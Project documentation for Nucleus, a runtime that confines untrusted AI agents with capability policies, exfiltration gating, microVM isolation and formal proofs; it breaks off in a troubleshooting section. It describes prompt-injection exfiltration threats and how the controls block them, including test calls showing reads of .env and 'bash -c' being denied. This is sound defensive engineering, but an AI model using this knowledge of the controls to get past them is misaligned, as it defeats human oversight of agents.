Nucleus Documentation
Nucleus is a capability-based runtime for running untrusted agents with explicit policy and hardened execution paths.
Use the sections below to explore the architecture, threat model, and integration notes.
Nucleus North Star
Vision
Nucleus makes “agent jailbreak → silent damage” provably impossible by construction, while remaining frictionless enough that small dev teams adopt it like a linter.
Assume the agent is compromised. Constrain what it can do anyway. Prove the constraints hold.
Flagship Safety Claim
No external side effect occurs unless it is mediated by Nucleus and authorized by a policy that can only stay the same or tighten during execution.
Corollaries:
- No exfiltration without an explicit sink capability.
- No “talk your way into more permissions” mid-run.
- No untrusted content reaching a sink without an approval/declassification gate.
This is the apodictic core — logically compelled, machine-checkable, marketable.
Theoretical Foundation
This claim rests on the capability safety theorem: in an object-capability (ocap) system, authority propagates only through explicit capability references. If the enforcement boundary is capability-safe, no code inside it can acquire authority it was not granted. This connects Nucleus to a 40-year lineage (E language, KeyKOS, seL4, Capsicum) and is the formal basis for “prove the boundary, not the model.”
Three Pillars
Pillar A — Math That Survives (Kernel Semantics)
The math core is small and sharp:
- Capability lattice (authority) — 12-dimensional product lattice with 3-level capability states (Never/LowRisk/Always). Compare, combine, and restrict permissions algebraically.
- Exposure lattice (trust) — 3-bool semilattice tracking `private_data`, `untrusted_content`, and `exfil_vector`. When all three co-occur (the uninhabitable state), the operation requires explicit approval. Exposure is monotone: it never decreases.
- Trace semantics (time) — ordered record of actions, authority, and exposure at each step. Free monoid with homomorphic exposure accumulation.
- Monotonicity (ratchet) — authority can only stay the same or tighten. Budget can only decrease. Exposure can only increase. The nucleus operator ν is idempotent and deflationary.
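The capability lattice and its ratchet can be sketched in a few lines of Python. This is an illustrative model only, not the Verus kernel: the names `Level`, `meet`, and `restrict` are hypothetical, and only two of the twelve dimensions are shown.

```python
from enum import IntEnum

class Level(IntEnum):
    # Ordered 3-level chain: NEVER < LOW_RISK < ALWAYS
    NEVER = 0
    LOW_RISK = 1
    ALWAYS = 2

def meet(a: Level, b: Level) -> Level:
    """Greatest lower bound on the chain: combining grants can only restrict."""
    return min(a, b)

def restrict(policy: dict, ceiling: dict) -> dict:
    # Product lattice: component-wise meet across capability dimensions.
    return {cap: meet(policy.get(cap, Level.NEVER), ceiling.get(cap, Level.NEVER))
            for cap in set(policy) | set(ceiling)}

start = {"read_files": Level.ALWAYS, "run_bash": Level.LOW_RISK}
mid_run = restrict(start, {"read_files": Level.ALWAYS, "run_bash": Level.NEVER})

# Ratchet: every dimension is <= its starting level; authority never widens.
assert all(mid_run[cap] <= start[cap] for cap in start)
```

Because `restrict` is a meet, "talk your way into more permissions" is unrepresentable: no sequence of restrictions can raise any component above its starting level.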
Key design choice: prove properties about the enforcement boundary, not about LLM behavior. The agent is a black box. The kernel is the TCB.
Current state (March 2026): 297 Verus proofs verified in CI covering lattice laws, uninhabitable state operator, Heyting algebra, modal operators (S4), exposure monoid, graded monad laws, Galois connections, fail-closed auth boundary, capability coverage theorem, budget monotonicity, and delegation ceiling theorem. Phase 0-2 partially complete.
Pillar B — Formal Methods as a Product Feature
Proofs are first-class artifacts, not academic exercises:
- Verus SMT proofs — machine-checked invariants for the Rust kernel, erased at compile time (zero runtime overhead). CI-gated minimum: 297 proofs.
- Lean 4 model (planned) — deeper mathematical reasoning via Aeneas translation and Mathlib connections.
- Differential testing (planned) — Cedar pattern: millions of random inputs compared between Rust engine and Lean model.
- Public Verified Claims page — each claim maps to a proof artifact and code commit.
- Continuous verification gates — CI fails if a change violates a proven invariant. No regression path.
Pillar C — Dead-Simple Developer Usability
A developer can get value in under 10 minutes. No lattice theory required.
- Install with `pip` (Python SDK) or `cargo` (Rust SDK)
- Run `nucleus audit` for immediate CI integration
- Wrap a workflow in a “safe session” with 10 lines of code
- Choose from built-in profiles, never think about lattices
Product Surface
One mental model across all entry points, with value at every tier:
Tier 0: `nucleus audit`
Fast value, no runtime required:
- Scan repo settings, MCP configs, agent configurations
- Emit PR comments / SARIF
- Generate a minimal safe profile + allowlist snippet
- PLG funnel entry: teams adopt this before committing to a runtime
Tier 0.5: `nucleus observe`
Bridge from “I don’t know what my agent does” to “here’s a tight profile”:
- Run alongside an existing agent, record all tool calls and side effects
- Suggest a minimal capability lattice policy based on observed behavior
- Output is formal (a lattice policy), not statistical (a behavioral baseline)
- Differentiator from ARMO: prescriptive output, not behavioral baseline
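In spirit, the observe → policy step can be sketched as follows. This is purely illustrative: the capability names, level strings, and inference rule are assumptions, not the actual `nucleus observe` implementation.

```python
CAPABILITIES = ["read_files", "write_files", "run_bash", "web_fetch", "git_push"]

def infer_policy(observed: list[str]) -> dict:
    """Minimal lattice policy admitting an observed trace (hypothetical sketch)."""
    # Start at the bottom of the lattice: deny everything.
    policy = {cap: "never" for cap in CAPABILITIES}
    for cap in observed:
        if cap in policy:
            # Grant the least level that admits the observed call.
            policy[cap] = "low_risk"
    return policy

observed = ["read_files", "read_files", "web_fetch"]
policy = infer_policy(observed)
assert policy["read_files"] == "low_risk"
assert policy["run_bash"] == "never"   # never observed, never granted
```

The key point of the design survives even this toy model: the output is a concrete lattice policy that can be reviewed and enforced, not a statistical baseline.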
Tier 1: `nucleus run --local`
Immediate felt safety:
- All side effects go through a local proxy
- No direct agent access except via the mediated gateway
- Approval prompts for risky actions (uninhabitable state triggers)
- Same policy language as Tier 2
Tier 2: `nucleus run --vm`
Hard containment:
- Firecracker microVM boundary (Firecracker-based isolation)
- Default-deny egress, allowlisted DNS/hosts
- gRPC tool proxy inside the VM, SPIFFE workload identity
- Same policy language, same traces, same proofs
- Target: <500ms cold start via pre-warmed VM pools
Dev usability does not wait for Tier 2. But Tier 2 is the “serious people” finish line.
MCP Mediation (cross-tier)
MCP is the de facto agent-tool protocol. Nucleus is an MCP-aware mediator:
- Interposes on MCP tool calls, applies capability checks, records traces
- `nucleus run` accepts MCP server configs and proxies them through the policy engine
- Any MCP client gets enforcement for free — no SDK adoption required
- Current state: the `nucleus-mcp` crate provides Claude Code ↔ tool-proxy bridging. Extend to general MCP mediation.
The Python SDK
The “Hello World” experience should feel like `requests` + `pathlib`, not like configuring SELinux.
SDK Principles
- A developer should never need to think about lattices
- Unsafe actions are impossible to express without explicit approval steps
- Audit traces are produced automatically
- Intent-based API maps to built-in profiles
Example
```python
from nucleus import Session, approve
from nucleus.tools import fs, net, git

with Session(profile="safe_pr_fixer") as s:
    readme = fs.read("README.md")            # ok
    fs.write("README.md", readme + "\n")     # ok (scoped)

    # risky: outbound fetch — explicit gate
    page = approve("fetch", net.fetch, "https://example.com")

    # forbidden: publish
    git.push("origin", "main")               # raises PolicyDenied
```
SDK Ships With
- Profiles: `safe_pr_fixer`, `doc_editor`, `test_runner`, `triage_bot`, `code_review`, `codegen`, `release`, `research_web`, `read_only`, `local_dev`
- Typed handles: `FileHandle`, `NetResponse`, `CommandOutput` that carry exposure metadata
- Exceptions: `PolicyDenied`, `ApprovalRequired`, `BudgetExceeded`, `StateBlocked`
- Trace export: `session.trace.export_jsonl()`
Current state (March 2026): Draft Python SDK at `sdk/python/` with intent-first API, mTLS/SPIFFE auth, and tool wrappers for fs/git/net. Functional for direct tool-proxy connections.
The Kernel Boundary
The agent process must not have ambient authority.
No direct egress. No direct filesystem beyond what is mediated. No token leaks.
The kernel is the only place where:
- Decisions are made (capability check)
- Approvals are validated (uninhabitable state gate)
- Traces are recorded (audit log)
- Exposure is tracked (monotone accumulation)
This is what makes formal verification tractable: the TCB is small (~10-15K LOC of verified Rust), and every path through it either enforces the lattice or panics. No fail-open. No silent degradation.
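The fail-closed shape is worth making concrete. A minimal sketch, assuming a toy policy map rather than the actual kernel API (`check`, `ORDER`, and `PolicyDenied`'s location are all hypothetical here): every path either grants an explicitly held capability or raises.

```python
ORDER = {"never": 0, "low_risk": 1, "always": 2}

class PolicyDenied(Exception):
    pass

def check(policy: dict, cap: str) -> str:
    """Fail-closed mediation: a missing capability or unknown level denies."""
    level = policy.get(cap, "never")       # absent grant = bottom of the lattice
    if level not in ORDER or level == "never":
        raise PolicyDenied(cap)            # no silent fall-through
    return level

policy = {"read_files": "always"}
assert check(policy, "read_files") == "always"
try:
    check(policy, "run_bash")              # never granted -> denied, not ignored
    raise AssertionError("should have denied")
except PolicyDenied:
    pass
```

There is no default-allow branch to mistype: denial is the starting state and every grant is an explicit exception to it.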
```
┌─────────────────────────────────────────────────────────────┐
│ Verified Core (Verus)                      ~10-15K LOC      │
│ ├── portcullis lattice engine              297 proofs       │
│ ├── exposure guard + uninhabitable state   proven monotone  │
│ ├── permission enforcement                 fail-closed      │
│ └── sandbox boundary                       proven panics    │
├─────────────────────────────────────────────────────────────┤
│ Formal Model (Lean 4 via Aeneas)           planned          │
│ ├── lattice algebra                        Mathlib links    │
│ ├── Heyting adjunction                     Lean 4 proofs    │
│ └── graded monad laws                      Lean 4 proofs    │
├─────────────────────────────────────────────────────────────┤
│ Differential Testing                       planned          │
│ ├── Rust engine vs Lean model              cargo fuzz       │
│ └── AutoVerus proof generation             CI-gated         │
├─────────────────────────────────────────────────────────────┤
│ Runtime (standard Rust)                    ~70K LOC         │
│ ├── gRPC, tokio, tonic                     Kani checks      │
│ ├── Firecracker + SPIFFE integration                        │
│ └── Tool proxy, audit, MCP                 proptest         │
└─────────────────────────────────────────────────────────────┘
```
Competitive Positioning
```
Formal Guarantees
          ▲
          │
          │          ★ Nucleus (target)
          │
Papers ●  │
(no product)
          │
AgentSpec ●
          │
──────────┼──────────────────► Dev Usability
          │
ARMO ●    │          E2B ●
          │          Daytona ●
CodeGate ●│          microsandbox ●
          │
```
Why Not X?
| Alternative | What it does | What it lacks |
|---|---|---|
| E2B / Daytona / microsandbox | Run code in Firecracker/Docker | No policy, no capability model, no exposure, no proofs. Ambient authority inside the box. |
| AgentSpec (ICSE 2026) | DSL for runtime rule enforcement | Ad-hoc rules, not lattice-based. No monotonicity guarantee. Rules are LLM-generated (95% precision — 5% are wrong). |
| ARMO | eBPF observe → baseline → enforce | Behavioral, not prescriptive. Must allow bad behavior before blocking it. No formal guarantees. |
| Google Agent Sandbox (GKE) | Pre-warmed VM pools, fast launch | Infrastructure-level only. No policy language, no exposure, no proofs. |
| CodeGate | Firecracker + locked pip installs | Single-purpose (supply chain). No general policy engine. |
Nucleus’s five differentiators:
- Capability lattice with monotonicity proof — authority is a mathematical ratchet, not a config file.
- Exposure tracking with uninhabitable state gate — information flow control that blocks exfiltration by construction.
- “Prove the boundary, not the model” — verify the enforcement kernel (tractable, seL4-style), not LLM behavior (impossible).
- Tiered value delivery — `nucleus audit` gives value before any runtime commitment. Audit-first PLG funnel.
- Vendor-agnostic by design — self-hosted runtime any orchestrator can target. No cloud lock-in.
What to Learn From the Field
- E2B’s SDK ergonomics — `pip install` + 3 lines = sandbox. Match this simplicity.
- ARMO’s progressive enforcement — the observe → baseline → enforce UX is excellent for teams that don’t know what policy to write. `nucleus observe` adopts this pattern but outputs formal policies, not behavioral baselines.
- microsandbox’s MCP integration — MCP-native runtime is table-stakes. Nucleus must be an MCP-aware mediator.
- AgentSpec’s DSL readability — trigger/predicate/action patterns are ergonomic. Policy authoring should be at least as readable.
- Google’s pre-warmed pools — sub-second cold start is an infrastructure requirement for Tier 2.
Formal Methods Ladder
Each rung is shippable independently.
Rung 1 — Verus SMT Proofs (in progress)
- 297 proofs verified in CI (minimum gate)
- Covers: lattice laws, uninhabitable state operator, Heyting algebra, S4 modal operators, exposure monoid, graded monad laws, Galois connections, fail-closed auth, capability coverage, budget monotonicity, delegation ceiling
- Key finding from proofs: nucleus operator ν is NOT monotone (proven counterexample — uninhabitable state fires for y but not x). This was discovered by the proofs, not by tests. The proofs are working.
Rung 2 — Lean 4 Model (planned, Phase 1)
- Translate portcullis to Lean 4 via Aeneas
- Link to Mathlib for established algebraic structures
- Deeper reasoning: induction over recursive structures, higher-order properties that SMT solvers struggle with
Rung 3 — Differential Testing (planned, Phase 3)
- Cedar pattern: Rust engine vs Lean model on millions of random inputs
- Catches: serialization boundaries, encoding issues, discrepancies between verified model and production code
- CI-gated: every PR checked against the formal model
Rung 4 — Extended TCB Verification (planned, Phase 4)
- Sandbox boundary, credential handling, tool proxy
- Kani bounded model checking for arithmetic paths
- Goal: full TCB machine-checked end to end
Rung 5 — TCB Minimization
The moonshot is not “prove all the code.” The moonshot is: make the proven kernel tiny enough that proving it is realistic. This is how seL4 thinking wins: reduce the surface you must trust.
Supply Chain Integrity (Exposure Tracking Use Case)
The exposure lattice has a concrete day-one demo: supply chain safety.
- Package installs from untrusted registries carry `untrusted_content` exposure
- Exposed dependencies cannot reach sinks (network, filesystem writes) without explicit approval
- Combined with `exfil_vector` exposure on git push / network egress, the uninhabitable state gate blocks dependency-confusion attacks by construction
- This is what CodeGate does with a bespoke tool. Nucleus does it as a natural consequence of the exposure lattice.
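The supply-chain gate falls out of the exposure join. A minimal Python model of the 3-bool semilattice (the class and field names mirror the doc's terminology but the API is hypothetical):

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Exposure:
    """3-bool join-semilattice; flags only go False -> True (monotone)."""
    private_data: bool = False
    untrusted_content: bool = False
    exfil_vector: bool = False

    def join(self, other: "Exposure") -> "Exposure":
        # Least upper bound: component-wise OR, so exposure never decreases.
        return Exposure(
            self.private_data or other.private_data,
            self.untrusted_content or other.untrusted_content,
            self.exfil_vector or other.exfil_vector,
        )

    @property
    def uninhabitable(self) -> bool:
        # All three legs co-occur -> explicit approval required.
        return self.private_data and self.untrusted_content and self.exfil_vector

session = Exposure()
session = session.join(Exposure(private_data=True))        # read secrets
session = session.join(Exposure(untrusted_content=True))   # install from untrusted registry
assert not session.uninhabitable                           # no sink reached yet

session = session.join(Exposure(exfil_vector=True))        # git push / network egress
assert session.uninhabitable                               # gate fires: approval required
```

A dependency-confusion payload cannot clear the `untrusted_content` bit later in the run, so any subsequent egress attempt lands in the gated state by construction.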
Success Criteria
Dev Adoption
- A team gets value in < 10 minutes
- `pip install nucleus` + `nucleus audit` produces:
  - a clear pass/fail in CI
  - a minimal safe profile suggestion
  - an MCP allowlist snippet
- `nucleus observe` generates a first-pass policy from 30 minutes of agent observation
Security
- “No direct agent calls except via proxy” is enforceable and demonstrable
- Traces are replayable and tamper-evident enough for incident review
- A red-team attempt produces a PolicyDenied or an approval request — not a leak
Formal Methods
- Public “Verified Claims” matrix:
- Claim → Proof artifact → Code hash
- CI fails if a change violates the proven model
- Verus proof count is monotonically non-decreasing (ratchet on proof count)
Performance
- Tier 2 cold start: <500ms with pre-warmed pools
- Policy evaluation overhead: <1ms per decision
- Exposure tracking overhead: negligible (3-bool join)
Iteration Plan
PR-sized increments that ship value while converging on the moonshot:
| PR | Scope | Ships |
|---|---|---|
| PR0 | North Star + Verified Claims doc | This document, claims table, threat model |
| PR1 | Python SDK skeleton | Session, exceptions, trace export, local proxy wiring |
| PR2 | Policy schema + canonical profiles | Tiny stable policy surface, “break the uninhabitable state” defaults |
| PR3 | Minimal kernel decision engine | Complete mediation for file/net/exec/publish, monotone session state |
| PR4 | Exposure plumbing | Exposure on handles, exposed-to-sink gating + approval |
| PR5 | Executable spec + model checking | Lock semantics early, prevent drift |
| PR6 | Proofs of the core invariants | Monotonicity + source-sink safety |
| PR7 | nucleus observe | Progressive discovery mode, formal policy output |
| PR8 | MCP mediation layer | General MCP interposition, not just Claude Code bridging |
| PR9 | VM mode hardening | Shrink ambient authority further, pre-warmed pools, <500ms target |
| PR10 | Attenuation tokens | Delegation that can only reduce power, “no escalation” cryptographically natural |
The North Star Sentence
Nucleus is a runtime that makes it impossible for an agent to do something dangerous unless you explicitly gave it the power — and that boundary is small enough to prove.
Others sandbox the agent. Nucleus proves the sandbox holds.
Why Rust
Rust is the only language that satisfies all four requirements simultaneously:
- Near-C performance — zero-cost abstractions, no GC, deterministic latency inside Firecracker microVMs
- Modern type system — algebraic data types, pattern matching, traits, async/await, package ecosystem
- Formal verification — Verus (SMT-based, SOSP 2025 Best Paper), Aeneas (Rust → Lean 4), Kani (bounded model checking), hax (Rust → F*)
- Safety certification — Ferrocene qualified at ISO 26262 ASIL-D, IEC 61508 SIL 4, IEC 62304 Class C
Precedents
- AWS Nitro Isolation Engine — formally verified Rust hypervisor (Verus + Isabelle/HOL). Deployed at AWS scale on Graviton5.
- Atmosphere microkernel (SOSP 2025 Best Paper) — L4-class microkernel verified with Verus. 7.5:1 proof-to-code ratio.
- AWS Cedar — formally verified authorization engine. Rust + Lean + differential testing. 1B auth/sec. Our architectural template.
- libcrux — formally verified post-quantum crypto in Rust via hax → F*. Shipping in Firefox.
- AutoVerus (OOPSLA 2025) — LLM agents auto-generate Verus proofs. 137/150 tasks proven, >90% automation rate.
References
- Verus: Verified Rust for Systems Code
- Atmosphere: SOSP 2025 Best Paper
- AutoVerus: OOPSLA 2025
- AWS Nitro Isolation Engine
- AWS Cedar Formal Verification
- Aeneas: Rust → Lean 4
- Ferrocene Qualified Rust Compiler
- libcrux: Verified Crypto via hax
- Systems Security Foundations for Agentic Computing
- AgentSpec: ICSE 2026
- Agent Behavioral Contracts
Local Testing Quickstart
Test Nucleus permission enforcement locally without Kubernetes or Firecracker.
Prerequisites
- Rust toolchain (1.75+)
- `curl` and `jq` for testing
1. Build the Tool Proxy
```bash
cargo build -p nucleus-tool-proxy --release
```
2. Start the Tool Proxy
```bash
./target/release/nucleus-tool-proxy \
  --spec examples/openclaw-demo/pod.yaml \
  --listen 127.0.0.1:8080 \
  --auth-secret demo-secret \
  --approval-secret approval-secret \
  --audit-log /tmp/nucleus-demo-audit.log
```
The demo profile includes the uninhabitable state (read + web + bash), so all bash commands require approval.
3. Test Permission Enforcement
Create a helper function for signed requests:
```bash
nucleus_call() {
  local ENDPOINT=$1
  local BODY=$2
  local TIMESTAMP=$(date +%s)
  local ACTOR="test"
  local MESSAGE="${TIMESTAMP}.${ACTOR}.${BODY}"
  local SIGNATURE=$(echo -n "${MESSAGE}" | openssl dgst -sha256 -hmac "demo-secret" | awk '{print $2}')
  curl -s -X POST "http://127.0.0.1:8080/v1/${ENDPOINT}" \
    -H "Content-Type: application/json" \
    -H "X-Nucleus-Timestamp: ${TIMESTAMP}" \
    -H "X-Nucleus-Actor: ${ACTOR}" \
    -H "X-Nucleus-Signature: ${SIGNATURE}" \
    -d "${BODY}"
}
```
Test Cases
Read allowed file (should succeed):

```bash
nucleus_call "read" '{"path":"README.md"}' | jq -r '.contents[:100]'
# Output: # Nucleus...
```

Read sensitive file (should be blocked):

```bash
nucleus_call "read" '{"path":".env"}' | jq '.error'
# Output: "nucleus error: access denied: path '.env' blocked by policy"
```

Run `git status` (requires approval due to uninhabitable state):

```bash
nucleus_call "run" '{"command":"git status"}' | jq '.'
# Output: {"error":"nucleus error: approval required...","kind":"approval_required"}
```

Run `bash -c` (blocked by command policy + uninhabitable state):

```bash
nucleus_call "run" '{"command":"bash -c \"echo hi\""}' | jq '.kind'
# Output: "approval_required"
```
4. Verify Audit Log
```bash
cat /tmp/nucleus-demo-audit.log | jq '{event, subject, result}'
```
Each entry includes:
- Hash-chained integrity (`prev_hash`, `hash`)
- HMAC signature (`signature`)
- Actor tracking
Expected Results
| Test | Expected | Reason |
|---|---|---|
| Read README.md | Success | Allowed path |
| Read .env | Blocked | Sensitive path pattern |
| git status | Approval required | Uninhabitable state active (read + web + bash) |
| bash -c | Approval required | Shell interpreter blocked + uninhabitable state |
Why the Uninhabitable State Triggers
The demo profile has:
- `read_files: Always` (private data access)
- `web_fetch: LowRisk` (untrusted content)
- `run_bash: LowRisk` (exfiltration vector)
All three legs of the “uninhabitable state” are present, so Nucleus automatically requires approval for exfiltration operations (run_bash, git_push, create_pr).
This protects against prompt injection attacks that could steal secrets via web content.
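The trigger condition can be checked mechanically from a profile's capability grants. The mapping of capabilities to exposure legs below is illustrative (inferred from the demo profile's description), not the kernel's actual rule set:

```python
def legs(profile: dict) -> dict:
    """Map capability grants to the three uninhabitable-state legs (sketch)."""
    granted = lambda cap: profile.get(cap, "never") != "never"
    return {
        "private_data": granted("read_files"),
        "untrusted_content": granted("web_fetch") or granted("web_search"),
        "exfil_vector": granted("run_bash") or granted("git_push") or granted("create_pr"),
    }

def uninhabitable(profile: dict) -> bool:
    # All three legs present -> approval required for exfiltration ops.
    return all(legs(profile).values())

demo = {"read_files": "always", "web_fetch": "low_risk", "run_bash": "low_risk"}
codegen = {"read_files": "always", "web_fetch": "never", "run_bash": "low_risk"}

assert uninhabitable(demo)        # read + web + bash: gate is active
assert not uninhabitable(codegen) # no untrusted content leg: bash runs freely
```

This is also why the `codegen` profile in the next section needs no approvals: with `web_fetch: Never` the untrusted-content leg never forms.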
Test with Network-Isolated Profile
For testing without uninhabitable-state protection, use the `codegen` profile, which has no web access:
```yaml
# codegen-pod.yaml
apiVersion: nucleus/v1
kind: Pod
metadata:
  name: codegen-test
spec:
  work_dir: .
  timeout_seconds: 3600
  policy:
    type: profile
    name: codegen
```

```bash
./target/release/nucleus-tool-proxy \
  --spec codegen-pod.yaml \
  --listen 127.0.0.1:8080 \
  --auth-secret demo-secret \
  --approval-secret approval-secret \
  --audit-log /tmp/codegen-audit.log
```
With `codegen`, bash commands succeed without approval (no uninhabitable state, because `web_fetch: Never`).
Next Steps
- Kubernetes Quickstart - Production deployment
- Permission Profiles - All available profiles
- OpenClaw Integration - Full OpenClaw adapter setup
macOS Quickstart
This guide walks you through setting up Nucleus on macOS with full Firecracker microVM isolation.
One-Line Install (Recommended)
For M3/M4 Macs running macOS 15+, get started instantly:
```bash
curl -fsSL https://raw.githubusercontent.com/coproduct-opensource/nucleus/main/scripts/install.sh | bash
```
This will:
- Install Lima (if not present)
- Download pre-built binaries and rootfs
- Create a Lima VM with nested virtualization
- Configure secrets in macOS Keychain
- Start nucleus-node
After installation, verify with:
```bash
nucleus doctor
nucleus run "uname -a"  # Should print: Linux ... aarch64 GNU/Linux
```
Manual Installation
If you prefer manual setup or need to customize the installation, follow the steps below.
Prerequisites
All Macs
- macOS 13+ (macOS 15+ recommended for nested virtualization)
- Lima 2.0+ (`brew install lima`) — required for nested virtualization support
- Rust toolchain (for building nucleus binaries)
- cross (`cargo install cross`) for cross-compiling Linux binaries
Note: Docker Desktop is not required. Lima VMs include Docker, so rootfs images are built inside the VM.
Verify Lima version:
```bash
limactl --version
# Should show: limactl version 2.0.0 or higher
```
Intel Mac Additional Requirements
Intel Macs require QEMU for the Lima VM (Apple Virtualization.framework only supports ARM64):
```bash
# Install QEMU
brew install qemu

# Fix cross-rs toolchain issue (required for cross-compilation)
rustup toolchain install stable-x86_64-unknown-linux-gnu --force-non-host
```
Note: Intel Macs cannot use hardware-accelerated nested virtualization. Firecracker microVMs will run via QEMU emulation, which is slower but fully functional.
Optimal Setup (Apple Silicon M3/M4)
For the best experience with native nested virtualization:
- Apple M3 or M4 chip
- macOS 15 (Sequoia) or newer
This combination provides hardware-accelerated KVM inside the Lima VM, giving near-native performance for Firecracker microVMs.
Native Testing on M3/M4 (Recommended)
If you have an M3 or M4 Mac running macOS 15+, you get native Firecracker performance with full KVM acceleration.
Verify Your Setup
nucleus doctor
Look for these indicators of full native support:
```
Platform
--------
[OK] Operating System: macos (aarch64)
[OK] Apple Chip: M4 (nested virt supported)
[OK] macOS Version: 15.2 (nested virt supported)

Lima VM
-------
[OK] Lima installed: yes
[OK] nucleus VM: running
[OK] KVM in VM: /dev/kvm available (native Firecracker performance)
[OK] Firecracker: Firecracker v1.14.1
```
If you see `[WARN] KVM in VM: /dev/kvm not available`, you’re running in emulation mode.
Why M3/M4 Matters
| Feature | M1/M2 | M3/M4 + macOS 15+ |
|---|---|---|
| Lima VM | Native (vz) | Native (vz) |
| /dev/kvm | Emulated | Hardware accelerated |
| Firecracker boot | ~2-3 seconds | ~100-200ms |
| microVM performance | Emulated | Near-native |
Testing the Full Stack
```bash
# 1. Setup (creates Lima VM with nested virt)
nucleus setup

# 2. Verify KVM is available (should show "native Firecracker performance")
limactl shell nucleus -- ls -la /dev/kvm
# Should show: crw-rw-rw- 1 root kvm ...

# 3. Start nucleus
nucleus start

# 4. Run test workload
nucleus run "uname -a"
# Should show: Linux ... aarch64 GNU/Linux

# 5. Verify Firecracker process (if you have tasks running)
limactl shell nucleus -- ps aux | grep firecracker
```
Troubleshooting M3/M4
| Issue | Cause | Solution |
|---|---|---|
| KVM not available | macOS < 15 | Upgrade to macOS 15 (Sequoia) |
| KVM not available | Lima using QEMU | Delete VM and run nucleus setup --force |
| Slow microVM start | Falling back to emulation | Check limactl info nucleus shows vmType: vz |
| Nested virt disabled | Lima config issue | Verify nestedVirtualization: true in lima.yaml |
Verifying Nested Virtualization
```bash
# Check Lima VM configuration
limactl info nucleus | grep -E "(vmType|nestedVirt)"
# Should show:
#   vmType: vz
#   nestedVirtualization: true

# Check KVM inside VM
limactl shell nucleus -- test -c /dev/kvm && echo "KVM OK" || echo "KVM missing"
```
Architecture
```
┌─────────────────────────────────────────────────────────────────┐
│ macOS Host                                                      │
│ ┌───────────────────────────────────────────────────────────┐   │
│ │ Lima VM (Apple Virtualization.framework)                  │   │
│ │ ┌─────────────────────────────────────────────────────┐   │   │
│ │ │ nucleus-node (orchestrator)                         │   │   │
│ │ │          ↓                                          │   │   │
│ │ │ ┌─────────────┐ ┌─────────────┐                     │   │   │
│ │ │ │ Firecracker │ │ Firecracker │ ... (microVMs)      │   │   │
│ │ │ │ ┌─────────┐ │ │ ┌─────────┐ │                     │   │   │
│ │ │ │ │guest-   │ │ │ │guest-   │ │                     │   │   │
│ │ │ │ │init →   │ │ │ │init →   │ │                     │   │   │
│ │ │ │ │tool-    │ │ │ │tool-    │ │                     │   │   │
│ │ │ │ │proxy    │ │ │ │proxy    │ │                     │   │   │
│ │ │ │ └─────────┘ │ │ └─────────┘ │                     │   │   │
│ │ │ └─────────────┘ └─────────────┘                     │   │   │
│ │ └─────────────────────────────────────────────────────┘   │   │
│ │ /dev/kvm (nested virtualization)                          │   │
│ └───────────────────────────────────────────────────────────┘   │
└─────────────────────────────────────────────────────────────────┘
```
Quick Start
1. Install Dependencies
```bash
# Install Lima
brew install lima

# Install cross for cross-compilation
cargo install cross
```
2. Setup Environment
```bash
# Run setup (creates Lima VM, secrets, config)
nucleus setup
```
This will:
- Detect your Mac’s chip (Intel vs Apple Silicon)
- Create a Lima VM with the appropriate architecture
- Download Firecracker and kernel for that architecture
- Generate secrets in macOS Keychain
- Create configuration at
~/.config/nucleus/config.toml
3. Build Rootfs
```bash
# Cross-compile binaries for the rootfs
./scripts/cross-build.sh

# Build rootfs in Lima VM (Lima includes Docker - no Docker Desktop needed!)
limactl shell nucleus -- make rootfs
```
The rootfs build happens inside the Lima VM, which has Docker pre-installed. Secrets are injected at runtime via the kernel command line; they’re not baked into the rootfs image.
4. Install nucleus-node
```bash
# Option A: Copy cross-compiled binary
limactl cp target/aarch64-unknown-linux-musl/release/nucleus-node nucleus:/usr/local/bin/

# Option B: Build inside VM (slower)
limactl shell nucleus -- cargo build --release -p nucleus-node
limactl shell nucleus -- sudo cp target/release/nucleus-node /usr/local/bin/
```
5. Start Nucleus
```bash
# Start nucleus-node service
nucleus start

# Output:
#   Nucleus is running!
#   HTTP API: http://127.0.0.1:8080
#   Metrics:  http://127.0.0.1:9080
```
6. Run Tasks
```bash
# Run a task with enforced permissions
nucleus run "Review the code in src/main.rs"
```
7. Stop Nucleus
```bash
# Stop nucleus-node (keeps VM running)
nucleus stop

# Stop nucleus-node AND the VM (saves resources)
nucleus stop --stop-vm
```
Platform Support
| Platform | VM Type | KVM | Performance |
|---|---|---|---|
| M3/M4 + macOS 15+ | vz (native) | Nested | Fast |
| M1/M2 + macOS 15+ | vz (native) | Emulated | Medium |
| M1-M4 + macOS <15 | vz (native) | Emulated | Medium |
| Intel Mac | QEMU (x86_64) | Emulated | Slow |
Security Model
Nucleus provides two layers of VM isolation:
Layer 1: Lima VM
- Apple Virtualization.framework (Apple Silicon) or QEMU (Intel)
- Isolates the Firecracker orchestrator from macOS
- Managed by Lima with port forwarding
Layer 2: Firecracker microVMs
- Minimal device model (5 virtio devices)
- Each task runs in its own microVM
- Read-only rootfs with scratch volume
Network Security
- Default-deny iptables policy
- DNS allowlist for controlled outbound access
- No direct internet access without explicit policy
Security Claims
| Layer | Isolation | Escape Difficulty |
|---|---|---|
| macOS ↔ Lima | Apple vz / QEMU | VM escape (high) |
| Lima ↔ Firecracker | KVM + jailer | VM escape (high) |
| Firecracker ↔ Agent | Minimal virtio | Kernel exploit (high) |
| Agent ↔ Network | iptables + allowlist | Policy bypass (medium) |
Troubleshooting
“KVM not available”
This warning appears when nested virtualization isn’t working. Causes:
- M1/M2 Macs: Don’t support nested virt (works via emulation, slower)
- macOS < 15: Upgrade to macOS Sequoia for nested virt support
- Intel Macs: Use QEMU emulation (slowest)
Intel Mac: “QEMU binary not found”
Install QEMU:
```bash
brew install qemu
```
Intel Mac: cross-rs “toolchain may not be able to run on this system”
This error occurs when cross-compiling for Linux on Intel Mac:
```
error: toolchain 'stable-x86_64-unknown-linux-gnu' may not be able to run on this system
```

Fix by installing the toolchain with the `--force-non-host` flag:

```bash
rustup toolchain install stable-x86_64-unknown-linux-gnu --force-non-host
```
See: cross-rs/cross#1687
“Lima VM failed to start”
```bash
# Check VM status
limactl list

# View VM logs
limactl shell nucleus -- journalctl -xe

# Delete and recreate
nucleus setup --force
```
“nucleus-node not found”
You need to install the nucleus-node binary in the VM:
```bash
# Cross-compile for the correct architecture
./scripts/cross-build.sh --arch aarch64  # or x86_64 for Intel

# Copy to VM
limactl cp target/aarch64-unknown-linux-musl/release/nucleus-node nucleus:/usr/local/bin/
```
Port forwarding issues
If `http://127.0.0.1:8080` doesn’t respond:

```bash
# Verify port forwarding
limactl list --format '{{.Name}} {{.Status}} {{.SSHLocalPort}}'

# Check if nucleus-node is listening
